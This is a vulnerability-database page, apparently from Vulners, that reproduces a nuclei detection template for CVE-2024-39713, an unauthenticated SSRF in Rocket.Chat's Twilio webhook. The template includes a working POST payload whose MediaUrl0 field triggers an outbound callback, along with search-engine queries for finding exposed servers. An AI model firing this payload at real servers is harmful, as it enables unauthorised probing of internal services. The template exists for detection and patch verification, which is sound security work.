Lucene search
+L

Rocket.Chat - Server-Side Request Forgery (SSRF)

🗓️ 25 Jul 2026 02:59:55Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 80 Views

Rocket.Chat SSRF affects Twilio webhook endpoint before version 6.10.1, CVE-2024-39713, severity high

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Server-Side Request Forgery in Rocket.Chat
31 Oct 202506:30
githubexploit
GithubExploit
Exploit for Server-Side Request Forgery in Rocket.Chat
7 Feb 202513:22
githubexploit
Circl
CVE-2024-39713
5 Aug 202408:03
circl
CNNVD
Rocket.Chat 安全漏洞
5 Aug 202400:00
cnnvd
CVE
CVE-2024-39713
5 Aug 202404:26
cve
Cvelist
CVE-2024-39713
5 Aug 202404:26
cvelist
Github Security Blog
Rocket.Chat Server-Side Request Forgery (SSRF) vulnerability
5 Aug 202406:30
github
Hacker One
Rocket.Chat: Unauthenticated full-read SSRF via Twilio integration
25 Feb 202306:08
hackerone
NVD
CVE-2024-39713
5 Aug 202405:15
nvd
OSV
CVE-2024-39713
5 Aug 202404:26
osv
Rows per page
id: CVE-2024-39713

info:
  name: Rocket.Chat - Server-Side Request Forgery (SSRF)
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services.
  remediation: |
    Update Rocket.Chat to version 6.10.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39713
    - https://hackerone.com/reports/1886954
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-39713
    cwe-id: CWE-918
    epss-score: 0.03201
    epss-percentile: 0.86787
    cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
  metadata:
    vendor: rocket.chat
    product: rocket.chat
    shodan-query: http.title:"rocket.chat"
    fofa-query: title="rocket.chat"
    google-query: intitle:"rocket.chat"
  tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat,vkev,vuln

http:
  - raw:
      - |
        POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "From": "5551123456782",
          "To": "5551987654323",
          "Body": "SMS message",
          "NumMedia": 1,
          "MediaUrl0":"http://{{interactsh-url}}",
          "MediaContentType0":"application/json"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<Response></Response>"

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4a0a0047304502206eaf22982520d497836131592cef849465bddb3d63ac2bce66663d6410041d8b022100c6e3a6de44ae3e15690a9d70d473ab2ff944e595f9c2d83a257d939b3fda6168:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.18.6
CVSS 38.6
EPSS0.03201
SSVC
80